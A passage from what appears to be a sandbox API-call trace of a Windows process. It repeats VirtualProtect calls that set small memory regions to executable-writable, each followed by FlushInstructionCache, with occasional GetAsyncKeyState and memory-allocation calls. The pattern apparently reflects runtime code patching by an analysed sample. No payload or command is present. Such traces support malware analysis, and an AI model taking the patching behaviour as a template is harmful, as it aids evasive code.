lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.055] GetCurrentProcess () returned 0xffffffff [0104.055] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0104.055] GetCurrentProcess () returned 0xffffffff [0104.055] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0104.055] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.055] GetCurrentProcess () returned 0xffffffff [0104.055] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0104.055] GetCurrentProcess () returned 0xffffffff [0104.055] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0104.055] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.056] GetCurrentProcess () returned 0xffffffff [0104.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0104.056] GetCurrentProcess () returned 0xffffffff [0104.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0104.056] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.056] GetCurrentProcess () returned 0xffffffff [0104.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0104.056] GetCurrentProcess () returned 0xffffffff [0104.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0104.056] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.057] GetCurrentProcess () returned 0xffffffff [0104.057] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0104.057] GetCurrentProcess () returned 0xffffffff [0104.057] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0104.057] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.058] GetCurrentProcess () returned 0xffffffff [0104.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0104.058] GetCurrentProcess () returned 0xffffffff [0104.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0104.059] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.059] GetCurrentProcess () returned 0xffffffff [0104.059] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0104.059] GetCurrentProcess () returned 0xffffffff [0104.059] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0104.059] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.059] GetCurrentProcess () returned 0xffffffff [0104.059] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0104.059] GetCurrentProcess () returned 0xffffffff [0104.059] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0104.059] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.060] GetCurrentProcess () returned 0xffffffff [0104.060] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0104.060] GetCurrentProcess () returned 0xffffffff [0104.060] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0104.060] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.060] GetCurrentProcess () returned 0xffffffff [0104.060] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0104.060] GetCurrentProcess () returned 0xffffffff [0104.060] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0104.060] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.061] GetCurrentProcess () returned 0xffffffff [0104.061] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0104.061] GetCurrentProcess () returned 0xffffffff [0104.061] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0104.061] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.061] GetCurrentProcess () returned 0xffffffff [0104.061] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0104.061] GetCurrentProcess () returned 0xffffffff [0104.061] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0104.061] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.062] GetCurrentProcess () returned 0xffffffff [0104.062] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0104.062] GetCurrentProcess () returned 0xffffffff [0104.062] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0104.062] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.062] GetCurrentProcess () returned 0xffffffff [0104.062] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0104.062] GetCurrentProcess () returned 0xffffffff [0104.062] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0104.062] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.063] GetCurrentProcess () returned 0xffffffff [0104.063] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0104.063] GetCurrentProcess () returned 0xffffffff [0104.063] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0104.063] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.063] GetCurrentProcess () returned 0xffffffff [0104.063] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0104.063] GetCurrentProcess () returned 0xffffffff [0104.063] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0104.063] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.064] GetCurrentProcess () returned 0xffffffff [0104.064] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0104.064] GetCurrentProcess () returned 0xffffffff [0104.064] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0104.064] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.064] GetCurrentProcess () returned 0xffffffff [0104.064] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0104.064] GetCurrentProcess () returned 0xffffffff [0104.064] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0104.064] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.065] GetCurrentProcess () returned 0xffffffff [0104.065] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0104.065] GetCurrentProcess () returned 0xffffffff [0104.065] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0104.065] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.065] GetCurrentProcess () returned 0xffffffff [0104.065] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0104.065] GetCurrentProcess () returned 0xffffffff [0104.065] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0104.065] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.066] GetCurrentProcess () returned 0xffffffff [0104.066] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0104.066] GetCurrentProcess () returned 0xffffffff [0104.066] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0104.066] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.066] GetCurrentProcess () returned 0xffffffff [0104.066] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0104.066] GetCurrentProcess () returned 0xffffffff [0104.066] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0104.066] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.067] GetCurrentProcess () returned 0xffffffff [0104.067] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0104.067] GetCurrentProcess () returned 0xffffffff [0104.067] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0104.067] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.067] GetCurrentProcess () returned 0xffffffff [0104.067] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0104.067] GetCurrentProcess () returned 0xffffffff [0104.067] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0104.067] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0104.068] GetCurrentProcess () returned 0xffffffff [0104.068] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0104.069] GetAsyncKeyState (vKey=3) returned 0 [0104.069] VarCmp (pvarLeft=0x197a1c, pvarRight=0x197a0c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0104.069] CRetailMalloc_Alloc () returned 0xcad4dc0 [0104.069] memcpy (in: _Dst=0xaf5168, _Src=0x19731c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0104.069] memcpy (in: _Dst=0xcad4de0, _Src=0x197384, _Size=0x18 | out: _Dst=0xcad4de0) returned 0xcad4de0 [0104.069] CRetailMalloc_Realloc () returned 0xcad4dc0 [0104.069] CRetailMalloc_Free () returned 0x1 [0104.069] GetCurrentProcess () returned 0xffffffff [0104.069] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0104.069] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.070] GetCurrentProcess () returned 0xffffffff [0104.070] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0104.070] GetCurrentProcess () returned 0xffffffff [0104.070] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0104.070] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.070] GetCurrentProcess () returned 0xffffffff [0104.071] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0104.071] GetCurrentProcess () returned 0xffffffff [0104.071] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0104.071] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.071] GetCurrentProcess () returned 0xffffffff [0104.071] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0104.071] GetCurrentProcess () returned 0xffffffff [0104.071] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0104.071] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.072] GetCurrentProcess () returned 0xffffffff [0104.072] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0104.072] GetCurrentProcess () returned 0xffffffff [0104.072] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0104.072] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.072] GetCurrentProcess () returned 0xffffffff [0104.072] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0104.072] GetCurrentProcess () returned 0xffffffff [0104.072] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0104.072] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.073] GetCurrentProcess () returned 0xffffffff [0104.073] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0104.073] GetCurrentProcess () returned 0xffffffff [0104.073] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0104.073] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.124] GetCurrentProcess () returned 0xffffffff [0104.124] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0104.124] GetCurrentProcess () returned 0xffffffff [0104.124] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0104.124] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.125] GetCurrentProcess () returned 0xffffffff [0104.125] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0104.125] GetCurrentProcess () returned 0xffffffff [0104.125] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0104.125] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.126] GetCurrentProcess () returned 0xffffffff [0104.126] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0104.126] GetCurrentProcess () returned 0xffffffff [0104.126] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0104.126] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.126] GetCurrentProcess () returned 0xffffffff [0104.126] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0104.126] GetCurrentProcess () returned 0xffffffff [0104.126] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0104.126] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.127] GetCurrentProcess () returned 0xffffffff [0104.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0104.127] GetCurrentProcess () returned 0xffffffff [0104.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0104.127] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.127] GetCurrentProcess () returned 0xffffffff [0104.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0104.127] GetCurrentProcess () returned 0xffffffff [0104.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0104.127] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.128] GetCurrentProcess () returned 0xffffffff [0104.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0104.128] GetCurrentProcess () returned 0xffffffff [0104.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0104.128] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.128] GetCurrentProcess () returned 0xffffffff [0104.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0104.128] GetCurrentProcess () returned 0xffffffff [0104.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0104.128] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.129] GetCurrentProcess () returned 0xffffffff [0104.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0104.129] GetCurrentProcess () returned 0xffffffff [0104.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0104.129] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.129] GetCurrentProcess () returned 0xffffffff [0104.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0104.130] GetCurrentProcess () returned 0xffffffff [0104.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0104.130] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.130] GetCurrentProcess () returned 0xffffffff [0104.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0104.130] GetCurrentProcess () returned 0xffffffff [0104.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0104.130] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.131] GetCurrentProcess () returned 0xffffffff [0104.131] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0104.131] GetCurrentProcess () returned 0xffffffff [0104.131] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0104.131] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.132] GetCurrentProcess () returned 0xffffffff [0104.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0104.132] GetCurrentProcess () returned 0xffffffff [0104.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0104.132] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.132] GetCurrentProcess () returned 0xffffffff [0104.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0104.132] GetCurrentProcess () returned 0xffffffff [0104.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0104.132] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.133] GetCurrentProcess () returned 0xffffffff [0104.133] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0104.133] GetCurrentProcess () returned 0xffffffff [0104.133] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0104.133] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.134] GetCurrentProcess () returned 0xffffffff [0104.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0104.134] GetCurrentProcess () returned 0xffffffff [0104.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0104.134] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.135] GetCurrentProcess () returned 0xffffffff [0104.135] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0104.135] GetCurrentProcess () returned 0xffffffff [0104.135] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0104.135] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.135] GetCurrentProcess () returned 0xffffffff [0104.136] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0104.136] GetCurrentProcess () returned 0xffffffff [0104.136] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0104.136] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.136] GetCurrentProcess () returned 0xffffffff [0104.136] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0104.136] GetCurrentProcess () returned 0xffffffff [0104.136] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0104.136] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.137] GetCurrentProcess () returned 0xffffffff [0104.137] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0104.137] GetCurrentProcess () returned 0xffffffff [0104.137] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0104.137] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.138] GetCurrentProcess () returned 0xffffffff [0104.138] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0104.138] GetCurrentProcess () returned 0xffffffff [0104.138] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0104.138] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.138] GetCurrentProcess () returned 0xffffffff [0104.138] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0104.138] GetCurrentProcess () returned 0xffffffff [0104.138] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0104.139] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.139] GetCurrentProcess () returned 0xffffffff [0104.139] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0104.139] GetCurrentProcess () returned 0xffffffff [0104.139] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0104.139] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.140] GetCurrentProcess () returned 0xffffffff [0104.140] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0104.140] GetCurrentProcess () returned 0xffffffff [0104.140] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0104.140] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0104.140] GetCurrentProcess () returned 0xffffffff [0104.140] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0104.141] GetAsyncKeyState (vKey=3) returned 0 [0104.142] VarCmp (pvarLeft=0x197a1c, pvarRight=0x197a0c, lcid=0x0, 